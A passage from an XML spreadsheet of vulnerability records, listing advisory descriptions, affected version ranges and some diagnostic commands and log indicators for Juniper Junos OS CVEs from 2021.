    <t>Due to a vulnerability in DDoS protection in Juniper Networks Junos OS and Junos OS Evolved on QFX5K Series switches in a VXLAN configuration, instability might be experienced in the underlay network as a consequence of exceeding the default ddos-protection aggregate threshold. If an attacker on a client device on the overlay network sends a high volume of specific, legitimate traffic in the overlay network, due to an improperly detected DDoS violation, the leaf might not process certain L2 traffic, sent by spines in the underlay network. Continued receipt and processing of the high volume traffic will sustain the Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS on QFX5K Series: 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R2-S8, 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R1-S8, 18.4R2-S6, 18.4R3-S6; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R2-S4, 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2; 20.3 versions prior to 20.3R1-S2, 20.3R2. Juniper Networks Junos OS Evolved on QFX5220: All versions prior to 20.3R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0260</t>
  </si>
  <si>
    <t>An improper authorization vulnerability in the Simple Network Management Protocol daemon (snmpd) service of Juniper Networks Junos OS leads an unauthenticated attacker being able to perform SNMP read actions, an Exposure of System Data to an Unauthorized Control Sphere, or write actions to OIDs that support write operations, against the device without authentication. This issue affects: Juniper Networks Junos OS: 17.2 version 17.2R1 and later versions; 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S12, 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R1-S8, 18.4R2-S5, 18.4R3; 19.1 versions prior to 19.1R2; 19.2 versions prior to 19.2R1-S6, 19.2R2; 19.3 versions prior to 19.3R2. This issue does not affect Juniper Networks Junos OS versions prior to 17.2R1.</t>
  </si>
  <si>
    <t>CVE-2021-0261</t>
  </si>
  <si>
    <t>A vulnerability in the HTTP/HTTPS service used by J-Web, Web Authentication, Dynamic-VPN (DVPN), Firewall Authentication Pass-Through with Web-Redirect, and Captive Portal allows an unauthenticated attacker to cause an extended Denial of Service (DoS) for these services by sending a high number of specific requests. This issue affects: Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S17 on EX Series; 12.3X48 versions prior to 12.3X48-D105 on SRX Series; 15.1 versions prior to 15.1R7-S8; 15.1X49 versions prior to 15.1X49-D230 on SRX Series; 16.1 versions prior to 16.1R7-S8; 17.4 versions prior to 17.4R2-S12, 17.4R3-S3; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S6; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R1-S3, 20.1R2; 20.2 versions prior to 20.2R1-S1, 20.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0262</t>
  </si>
  <si>
    <t>Through routine static code analysis of the Juniper Networks Junos OS software codebase, the Secure Development Life Cycle team identified a Use After Free vulnerability in PFE packet processing on the QFX10002-60C switching platform. Exploitation of this vulnerability may allow a logically adjacent attacker to trigger a Denial of Service (DoS). Continued exploitation of this vulnerability will sustain the Denial of Service (DoS) condition. This issue only affects QFX10002-60C devices. No other product or platform is vulnerable to this issue. This issue affects Juniper Networks Junos OS on QFX10002-60C: 19.1 version 19.1R3-S1 and later versions; 19.1 versions prior to 19.1R3-S3; 19.2 version 19.2R2 and later versions; 19.2 versions prior to 19.2R3-S1; 20.2 versions prior to 20.2R1-S2. This issue does not affect Juniper Networks Junos OS: versions prior to 19.1R3; 19.2 versions prior to 19.2R2; any version of 19.3; version 20.2R2 and later releases.</t>
  </si>
  <si>
    <t>CVE-2021-0263</t>
  </si>
  <si>
    <t>A Data Processing vulnerability in the Multi-Service process (multi-svcs) on the FPC of Juniper Networks Junos OS on the PTX Series routers may lead to the process becoming unresponsive, ultimately affecting traffic forwarding, allowing an attacker to cause a Denial of Service (DoS) condition . The Multi-Service Process running on the FPC is responsible for handling sampling-related operations when a J-Flow configuration is activated. This can occur during periods of heavy route churn, causing the Multi-Service Process to stop processing updates, without consuming any further updates from kernel. This back pressure towards the kernel affects further dynamic updates from other processes in the system, including RPD, causing a KRT-STUCK condition and traffic forwarding issues. An administrator can monitor the following command to check if there is the KRT queue is stuck: user@device &gt; show krt state ... Number of async queue entries: 65007 &lt;--- this value keep on increasing. The following logs/alarms will be observed when this condition exists: user@junos&gt; show chassis alarms 2 alarms currently active Alarm time Class Description 2020-10-11 04:33:45 PDT Minor Potential slow peers are: MSP(FPC1-PIC0) MSP(FPC3-PIC0) MSP(FPC4-PIC0) Logs: Oct 11 04:33:44.672 2020 test /kernel: rts_peer_cp_recv_timeout : Bit set for msp8 as it is stuck Oct 11 04:35:56.000 2020 test-lab fpc4 user.err gldfpc-multi-svcs.elf: Error in parsing composite nexthop Oct 11 04:35:56.000 2020 test-lab fpc4 user.err gldfpc-multi-svcs.elf: composite nexthop parsing error Oct 11 04:43:05 2020 test /kernel: rt_pfe_veto: Possible slowest client is msp38. States processed - 65865741. States to be processed - 0 Oct 11 04:55:55 2020 test /kernel: rt_pfe_veto: Memory usage of M_RTNEXTHOP type = (0) Max size possible for M_RTNEXTHOP type = (8311787520) Current delayed unref = (60000), Current unique delayed unref = (10896), Max delayed unref on this platform = (40000) Current delayed weight unref = (71426) Max delayed weight unref on this platform= (400000) curproc = rpd Oct 11 04:56:00 2020 test /kernel: rt_pfe_veto: Too many delayed route/nexthop unrefs. Op 2 err 55, rtsm_id 5:-1, msg type 2 This issue only affects PTX Series devices. No other products or platforms are affected by this vulnerability. This issue affects Juniper Networks Junos OS on PTX Series: 18.2 versions prior to 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S8, 18.4R3-S7; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R3-S1; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R2-S4, 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2; 20.3 versions prior to 20.3R1-S2, 20.3R2. This issue does not affect Juniper Networks Junos OS versions prior to 18.2R1.</t>
  </si>
  <si>
    <t>CVE-2021-0264</t>
  </si>
  <si>
    <t>A vulnerability in the processing of traffic matching a firewall filter containing a syslog action in Juniper Networks Junos OS on MX Series with MPC10/MPC11 cards installed, PTX10003 and PTX10008 Series devices, will cause the line card to crash and restart, creating a Denial of Service (DoS). Continued receipt and processing of packets matching the firewall filter can create a sustained Denial of Service (DoS) condition. When traffic hits the firewall filter, configured on lo0 or any physical interface on the line card, containing a term with a syslog action (e.g. 'term &lt;name&gt; then syslog'), the affected line card will crash and restart, impacting traffic processing through the ports of the line card. This issue only affects MX Series routers with MPC10 or MPC11 line cards, and PTX10003 or PTX10008 Series packet transport routers. No other platforms or models of line cards are affected by this issue. Note: This issue has also been identified and described in technical service bulletin TSB17931 (login required). This issue affects: Juniper Networks Junos OS on MX Series: 19.3 versions prior to 19.3R3-S2; 19.4 versions prior to 19.4R3-S2; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R2-S2, 20.2R3; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2. Juniper Networks Junos OS Evolved on PTX10003, PTX10008: All versions prior to 20.4R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 19.3R1.</t>
  </si>
  <si>
    <t>CVE-2021-0265</t>
  </si>
  <si>
    <t>An unvalidated REST API in the AppFormix Agent of Juniper Networks AppFormix allows an unauthenticated remote attacker to execute commands as root on the host running the AppFormix Agent, when certain preconditions are performed by the attacker, thus granting the attacker full control over the environment. This issue affects: Juniper Networks AppFormix 3 versions prior to 3.1.22, 3.2.14, 3.3.0.</t>
  </si>
  <si>
    <t>CVE-2021-0266</t>
  </si>
  <si>
    <t>The use of multiple hard-coded cryptographic keys in cSRX Series software in Juniper Networks Junos OS allows an attacker to take control of any instance of a cSRX deployment through device management services. This issue affects: Juniper Networks Junos OS on cSRX Series: All versions prior to 20.2R3; 20.3 versions prior to 20.3R2; 20.4 versions prior to 20.4R2.</t>
  </si>
  <si>
    <t>CVE-2021-0267</t>
  </si>
  <si>
    <t>An Improper Input Validation vulnerability in the active-lease query portion in JDHCPD's DHCP Relay Agent of Juniper Networks Junos OS allows an attacker to cause a Denial of Service (DoS) by sending a crafted DHCP packet to the device thereby crashing the jdhcpd DHCP service. This is typically configured for Broadband Subscriber Sessions. Continued receipt and processing of this crafted packet will create a sustained Denial of Service (DoS) condition. This issue affects Juniper Networks Junos OS: 19.4 versions prior to 19.4R3-S1; 20.1 versions prior to 20.1R2-S1, 20.1R3; 20.2 versions prior to 20.2R3; 20.3 versions prior to 20.3R2. This issue does not affect Junos OS Evolved.</t>
  </si>
  <si>
    <t>CVE-2021-0268</t>
  </si>
  <si>
    <t>An Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting') weakness in J-web of Juniper Networks Junos OS leads to buffer overflows, segment faults, or other impacts, which allows an attacker to modify the integrity of the device and exfiltration information from the device without authentication. The weakness can be exploited to facilitate cross-site scripting (XSS), cookie manipulation (modifying session cookies, stealing cookies) and more. This weakness can also be exploited by directing a user to a seemingly legitimate link from the affected site. The attacker requires no special access or permissions to the device to carry out such attacks. This issue affects: Juniper Networks Junos OS: 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S3; 19.1 versions prior to 19.1R2-S2, 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R2; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 18.1R1.</t>
  </si>
  <si>
    <t>CVE-2021-0269</t>
  </si>
  <si>
    <t>The improper handling of client-side parameters in J-Web of Juniper Networks Junos OS allows an attacker to perform a number of different malicious actions against a target device when a user is authenticated to J-Web. An attacker may be able to supersede existing parameters, including hardcoded parameters within the HTTP/S session, access and exploit variables, bypass web application firewall rules or input validation mechanisms, and otherwise alter and modify J-Web's normal behavior. An attacker may be able to transition victims to malicious web services, or exfiltrate sensitive information from otherwise secure web forms. This issue affects: Juniper Networks Junos OS: All versions prior to 17.4R3-S3; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R3-S6; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R3-S6; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R3-S1; 19.3 versions prior to 19.3R3-S1; 19.4 versions prior to 19.4R2-S2, 19.4R3; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0270</t>
  </si>
  <si>
    <t>On PTX Series and QFX10k Series devices with the "inline-jflow" feature enabled, a use after free weakness in the Packet Forwarding Engine (PFE) microkernel architecture of Juniper Networks Junos OS may allow an attacker to cause a Denial of Service (DoS) condition whereby one or more Flexible PIC Concentrators (FPCs) may restart. As this is a race condition situation this issue become more likely to be hit when network instability occurs, such as but not limited to BGP/IGP reconvergences, and/or further likely to occur when more active "traffic flows" are occurring through the device. When this issue occurs, it will cause one or more FPCs to restart unexpectedly. During FPC restarts core files will be generated. While the core file is generated traffic will be disrupted. Sustained receipt of large traffic flows and reconvergence-like situations may sustain the Denial of Service (DoS) situation. This issue affects: Juniper Networks Junos OS: 18.1 version 18.1R2 and later versions prior to 18.1R3-S10 on PTX Series, QFX10K Series.</t>
  </si>
  <si>
    <t>CVE-2021-0271</t>
  </si>
  <si>
    <t>A Double Free vulnerability in the software forwarding interface daemon (sfid) process of Juniper Networks Junos OS allows an adjacently-connected attacker to cause a Denial of Service (DoS) by sending a crafted ARP packet to the device. Continued receipt and processing of the crafted ARP packets will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS on EX2200-C Series, EX3200 Series, EX3300 Series, EX4200 Series, EX4500 Series, EX4550 Series, EX6210 Series, EX8208 Series, EX8216 Series. 12.3 versions prior to 12.3R12-S17; 15.1 versions prior to 15.1R7-S8. This issue only affects the listed Marvell-chipset based EX Series devices. No other products or platforms are affected.</t>
  </si>
  <si>
    <t>CVE-2021-0272</t>
  </si>
  <si>
    <t>A kernel memory leak in QFX10002-32Q, QFX10002-60C, QFX10002-72Q, QFX10008, QFX10016 devices Flexible PIC Concentrators (FPCs) on Juniper Networks Junos OS allows an attacker to send genuine packets destined to the device to cause a Denial of Service (DoS) to the device. On QFX10002-32Q, QFX10002-60C, QFX10002-72Q devices the device will crash and restart. On QFX10008, QFX10016 devices, depending on the number of FPCs involved in an attack, one more more FPCs may crash and traffic through the device may be degraded in other ways, until the attack traffic stops. A reboot is required to restore service and clear the kernel memory. Continued receipt and processing of these genuine packets will create a sustained Denial of Service (DoS) condition. On QFX10008, QFX10016 devices, an indicator of compromise may be the existence of DCPFE core files. You can also monitor PFE memory utilization for incremental growth: user@qfx-RE:0% cprod -A fpc0 -c "show heap 0" | grep -i ke 0 3788a1b0 3221225048 2417120656 804104392 24 Kernel user@qfx-RE:0% cprod -A fpc0 -c "show heap 0" | grep -i ke 0 3788a1b0 3221225048 2332332200 888892848 27 Kernel This issue affects: Juniper Networks Junos OS on QFX10002-32Q, QFX10002-60C, QFX10002-72Q, QFX10008, QFX10016: 16.1 versions 16.1R1 and above prior to 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R3-S2; 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R3; 19.3 versions prior to 19.3R3; 19.4 versions prior to 19.4R3; 20.1 versions prior to 20.1R2. This issue does not affect releases prior to Junos OS 16.1R1. This issue does not affect EX Series devices. This issue does not affect Junos OS Evolved.</t>
  </si>
  <si>
    <t>CVE-2021-0273</t>
  </si>
  <si>
    <t>An always-incorrect control flow implementation in the implicit filter terms of Juniper Networks Junos OS and Junos OS Evolved on ACX5800, EX9200 Series, MX10000 Series, MX240, MX480, MX960 devices with affected Trio line cards allows an attacker to exploit an interdependency in the PFE UCODE microcode of the Trio chipset with various line cards to cause packets destined to the devices interfaces to cause a Denial of Service (DoS) condition by looping the packet with an unreachable exit condition ('Infinite Loop'). To break this loop once it begins one side of the affected LT interfaces will need to be disabled. Once disabled, the condition will clear and the disabled LT interface can be reenabled. Continued receipt and processing of these packets will create a sustained Denial of Service (DoS) condition. This issue only affects LT-LT interfaces. Any other interfaces are not affected by this issue. This issue affects the following cards: MPCE Type 3 3D MPC4E 3D 32XGE MPC4E 3D 2CGE+8XGE EX9200 32x10G SFP EX9200-2C-8XS FPC Type 5-3D FPC Type 5-LSR EX9200 4x40G QSFP An Indicator of Compromise (IoC) can be seen by examining the traffic of the LT-LT interfaces for excessive traffic using the following command: monitor interface traffic Before loop impact: Interface: lt-2/0/0, Enabled, Link is Up Encapsulation: Logical-tunnel, Speed: 100000mbps Traffic statistics: Current delta Input bytes: 3759900268942 (1456 bps) [0] &lt;---------- LT interface utilization is low Output bytes: 3759900344309 (1456 bps) [0] &lt;---------- LT interface utilization is low After loop impact: Interface: lt-2/0/0, Enabled, Link is Up Encapsulation: Logical-tunnel, Speed: 100000mbps Traffic statistics: Current delta Input bytes: 3765160313129 (2158268368 bps) [5260044187] &lt;---------- LT interface utilization is very high Output bytes: 3765160399522 (2158266440 bps) [5260055213] &lt;---------- LT interface utilization is very high This issue affects: Juniper Networks Junos OS on ACX5800, EX9200 Series, MX10000 Series, MX240, MX480, MX960. Versions 15.1F6, 16.1R1, and later versions prior to 16.1R7-S8; 17.1 versions prior to 17.1R2-S12; 17.2 versions prior to 17.2R3-S4; 17.3 versions prior to 17.3R3-S8; 17.4 versions prior to 17.4R2-S10, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R2-S7, 18.2R3-S3; 18.3 versions prior to 18.3R1-S7, 18.3R3-S2; 18.4 versions prior to 18.4R1-S7, 18.4R2-S4, 18.4R3-S2; 19.1 versions prior to 19.1R1-S5, 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S4, 19.2R2; 19.3 versions prior to 19.3R2-S3, 19.3R3; 19.4 versions prior to 19.4R1-S1, 19.4R2. This issue does not affect the MX10001. This issue does not affect Juniper Networks Junos OS versions prior to 15.1F6, 16.1R1. Juniper Networks Junos OS Evolved on ACX5800, EX9200 Series, MX10000 Series, MX240, MX480, MX960 19.4 versions prior to 19.4R2-EVO. This issue does not affect the MX10001.</t>
  </si>
  <si>
    <t>CVE-2021-0275</t>
  </si>
  <si>
    <t>A Cross-site Scripting (XSS) vulnerability in J-Web on Juniper Networks Junos OS allows an attacker to target another user's session thereby gaining access to the users session. The other user session must be active for the attack to succeed. Once successful, the attacker has the same privileges as the user. If the user has root privileges, the attacker may be able to gain full control of the device. This issue affects: Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S15 on EX Series; 12.3X48 versions prior to 12.3X48-D95 on SRX Series; 15.1 versions prior to 15.1R7-S6 on EX Series; 15.1X49 versions prior to 15.1X49-D200 on SRX Series; 16.1 versions prior to 16.1R7-S7; 16.2 versions prior to 16.2R2-S11, 16.2R3; 17.1 versions prior to 17.1R2-S11, 17.1R3-S2; 17.2 versions prior to 17.2R3-S3; 17.3 versions prior to 17.3R2-S5, 17.3R3-S7; 17.4 versions prior to 17.4R2-S9, 17.4R3; 18.1 versions prior to 18.1R3-S9; 18.2 versions prior to 18.2R2-S7, 18.2R3-S3; 18.3 versions prior to 18.3R1-S7, 18.3R2-S3, 18.3R3-S1; 18.4 versions prior to 18.4R1-S6, 18.4R2-S4, 18.4R3; 19.1 versions prior to 19.1R2-S1, 19.1R3; 19.2 versions prior to 19.2R1-S3, 19.2R2; 19.3 versions prior to 19.3R2.</t>
  </si>
  <si>
    <t>CVE-2021-0276</t>
  </si>
  <si>
    <t>A stack-based Buffer Overflow vulnerability in Juniper Networks SBR Carrier with EAP (Extensible Authentication Protocol) authentication configured, allows an attacker sending specific packets causing the radius daemon to crash resulting with a Denial of Service (DoS) or leading to remote code execution (RCE). By continuously sending this specific packets, an attacker can repeatedly crash the radius daemon, causing a sustained Denial of Service (DoS). This issue affects Juniper Networks SBR Carrier: 8.4.1 versions prior to 8.4.1R19; 8.5.0 versions prior to 8.5.0R10; 8.6.0 versions prior to 8.6.0R4.</t>
  </si>
  <si>
    <t>CVE-2021-0277</t>
  </si>
  <si>
    <t>An Out-of-bounds Read vulnerability in the processing of specially crafted LLDP frames by the Layer 2 Control Protocol Daemon (l2cpd) of Juniper Networks Junos OS and Junos OS Evolved may allow an attacker to cause a Denial of Service (DoS), or may lead to remote code execution (RCE). Continued receipt and processing of these frames, sent from the local broadcast domain, will repeatedly crash the l2cpd process and sustain the Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S18; 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R2-S13, 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8, 18.4R3-S8; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R3-S1; 20.3 versions prior to 20.3R2-S1, 20.3R3; 20.4 versions prior to 20.4R2. Juniper Networks Junos OS Evolved versions prior to 20.4R2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0278</t>
  </si>
  <si>
    <t>An Improper Input Validation vulnerability in J-Web of Juniper Networks Junos OS allows a locally authenticated attacker to escalate their privileges to root over the target device. junos:18.3R3-S5 junos:18.4R3-S9 junos:19.1R3-S6 junos:19.3R2-S6 junos:19.3R3-S3 junos:19.4R1-S4 junos:19.4R3-S4 junos:20.1R2-S2 junos:20.1R3 junos:20.2R3-S1 junos:20.3X75-D20 junos:20.3X75-D30 junos:20.4R2-S1 junos:20.4R3 junos:21.1R1-S1 junos:21.1R2 junos:21.2R1 junos:21.3R1 This issue affects: Juniper Networks Junos OS 19.3 versions 19.3R1 and above prior to 19.3R2-S6, 19.3R3-S3; 19.4 versions prior to 19.4R3-S5; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 19.3R1.</t>
  </si>
  <si>
    <t>CVE-2021-0279</t>
  </si>
  <si>
    <t>Juniper Networks Contrail Cloud (CC) releases prior to 13.6.0 have RabbitMQ service enabled by default with hardcoded credentials. The messaging services of RabbitMQ are used when coordinating operations and status information among Contrail services. An attacker with access to an administrative service for RabbitMQ (e.g. GUI), can use these hardcoded credentials to cause a Denial of Service (DoS) or have access to unspecified sensitive system information. This issue affects the Juniper Networks Contrail Cloud releases on versions prior to 13.6.0.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:H</t>
  </si>
  <si>
    <t>CVE-2021-0280</t>
  </si>
  <si>
    <t>Due to an Improper Initialization vulnerability in Juniper Networks Junos OS on PTX platforms and QFX10K Series with Paradise (PE) chipset-based line cards, ddos-protection configuration changes made from the CLI will not take effect as expected beyond the default DDoS (Distributed Denial of Service) settings in the Packet Forwarding Engine (PFE). This may cause BFD sessions to flap when a high rate of specific packets are received. Flapping of BFD sessions in turn may impact routing protocols and network stability, leading to a Denial of Service (DoS) condition. Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue affects only the following platforms with Paradise (PE) chipset-based line cards: PTX1000, PTX3000 (NextGen), PTX5000, PTX10008, PTX10016 Series and QFX10002 Series. This issue affects: Juniper Networks Junos OS 17.4 versions prior to 17.4R3-S5 on PTX Series, QFX10K Series; 18.2 versions prior to 18.2R3-S8 on PTX Series, QFX10K Series; 18.3 versions prior to 18.3R3-S5 on PTX Series, QFX10K Series; 18.4 versions prior to 18.4R2-S8 on PTX Series, QFX10K Series; 19.1 versions prior to 19.1R3-S5 on PTX Series, QFX10K Series; 19.2 versions prior to 19.2R3-S2 on PTX Series, QFX10K Series; 19.3 versions prior to 19.3R3-S2 on PTX Series, QFX10K Series; 19.4 versions prior to 19.4R3-S2 on PTX Series, QFX10K Series; 20.1 versions prior to 20.1R3 on PTX Series, QFX10K Series; 20.2 versions prior to 20.2R2-S3, 20.2R3 on PTX Series, QFX10K Series; 20.3 versions prior to 20.3R2 on PTX Series, QFX10K Series; 20.4 versions prior to 20.4R2 on PTX Series, QFX10K Series.</t>
  </si>
  <si>
    <t>CVE-2021-0281</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS devices configured with BGP origin validation using Resource Public Key Infrastructure (RPKI) receipt of a specific packet from the RPKI cache server may cause routing process daemon (RPD) to crash and restart, creating a Denial of Service (DoS) condition. Continued receipt and processing of this packet will create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS 17.3 versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8, 18.4R3-S8; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R2-S4, 19.4R3-S3; 20.1 versions prior to 20.1R3; 20.2 versions prior to 20.2R3; 20.3 versions prior to 20.3R2; 20.4 versions prior to 20.4R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R2-S2-EVO.</t>
  </si>
  <si>
    <t>CVE-2021-0282</t>
  </si>
  <si>
    <t>On Juniper Networks Junos OS devices with Multipath or add-path feature enabled, processing a specific BGP UPDATE can lead to a routing process daemon (RPD) crash and restart, causing a Denial of Service (DoS). Continued receipt and processing of this UPDATE message will create a sustained Denial of Service (DoS) condition. This BGP UPDATE message can propagate to other BGP peers with vulnerable Junos versions on which Multipath or add-path feature is enabled, and cause RPD to crash and restart. This issue affects both IBGP and EBGP deployments in IPv4 or IPv6 network. Junos OS devices that do not have the BGP Multipath or add-path feature enabled are not affected by this issue. This issue affects: Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S18; 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S4; 18.1 versions prior to 18.1R3-S12; 18.2 versions prior to 18.2R3-S7; 18.3 versions prior to 18.3R3-S4; 18.4 versions prior to 18.4R2-S6, 18.4R3-S6; 19.1 versions prior to 19.1R3-S3;</t>
  </si>
  <si>
    <t>CVE-2021-0283</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the TCP/IP stack of Juniper Networks Junos OS allows an attacker to send specific sequences of packets to the device thereby causing a Denial of Service (DoS). By repeatedly sending these sequences of packets to the device, an attacker can sustain the Denial of Service (DoS) condition. The device will abnormally shut down as a result of these sent packets. A potential indicator of compromise will be the following message in the log files: "eventd[13955]: SYSTEM_ABNORMAL_SHUTDOWN: System abnormally shut down" These issue are only triggered by traffic destined to the device. Transit traffic will not trigger these issues. This issue affects: Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S19; 15.1 versions prior to 15.1R7-S10; 16.1 version 16.1R1 and later versions; 16.2 version 16.2R1 and later versions; 17.1 version 17.1R1 and later versions; 17.2 version 17.2R1 and later versions; 17.3 versions prior to 17.3R3-S12; 17.4 version 17.4R1 and later versions; 18.1 versions prior to 18.1R3-S13; 18.2 version 18.2R1 and later versions; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S9, 18.4R3-S9; 19.1 versions prior to 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S7, 19.3R3-S3; 19.4 versions prior to 19.4R3-S5; 20.1 versions prior to 20.1R2-S2, 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2; 21.2 versions prior to 21.2R1-S1, 21.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0284</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the TCP/IP stack of Juniper Networks Junos OS allows an attacker to send specific sequences of packets to the device thereby causing a Denial of Service (DoS). By repeatedly sending these sequences of packets to the device, an attacker can sustain the Denial of Service (DoS) condition. The device will abnormally shut down as a result of these sent packets. A potential indicator of compromise will be the following message in the log files: "eventd[13955]: SYSTEM_ABNORMAL_SHUTDOWN: System abnormally shut down" This issue is only triggered by traffic destined to the device. Transit traffic will not trigger this issue. This issue affects: Juniper Networks Junos OS 12.3 versions prior to 12.3R12-S19; 15.1 versions prior to 15.1R7-S10; 17.3 versions prior to 17.3R3-S12; 18.4 versions prior to 18.4R2-S9, 18.4R3-S9; 19.1 versions prior to 19.1R3-S7; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S7, 19.3R3-S3; 19.4 versions prior to 19.4R3-S5; 20.1 versions prior to 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3-S1; 20.4 versions prior to 20.4R2-S2, 20.4R3; 21.1 versions prior to 21.1R2; 21.2 versions prior to 21.2R1-S1, 21.2R2.</t>
  </si>
  <si>
    <t>CVE-2021-0285</t>
  </si>
  <si>
    <t>An uncontrolled resource consumption vulnerability in Juniper Networks Junos OS on QFX5000 Series and EX4600 Series switches allows an attacker sending large amounts of legitimate traffic destined to the device to cause Interchassis Control Protocol (ICCP) interruptions, leading to an unstable control connection between the Multi-Chassis Link Aggregation Group (MC-LAG) nodes which can in turn lead to traffic loss. Continued receipt of this amount of traffic will create a sustained Denial of Service (DoS) condition. An indication that the system could be impacted by this issue is the following log message: "DDOS_PROTOCOL_VIOLATION_SET: Warning: Host-bound traffic for protocol/exception LOCALNH:aggregate exceeded its allowed bandwidth at fpc &lt;fpc number&gt; for &lt;n&gt; times, started at &lt;timestamp&gt;" This issue affects Juniper Networks Junos OS on QFX5000 Series and EX4600 Series: 15.1 versions prior to 15.1R7-S9; 17.3 versions prior to 17.3R3-S11; 17.4 versions prior to 17.4R2-S13, 17.4R3-S5; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R2-S8, 18.4R3-S7; 19.1 versions prior to 19.1R3-S5; 19.2 versions prior to 19.2R1-S6, 19.2R3-S2; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S2; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior 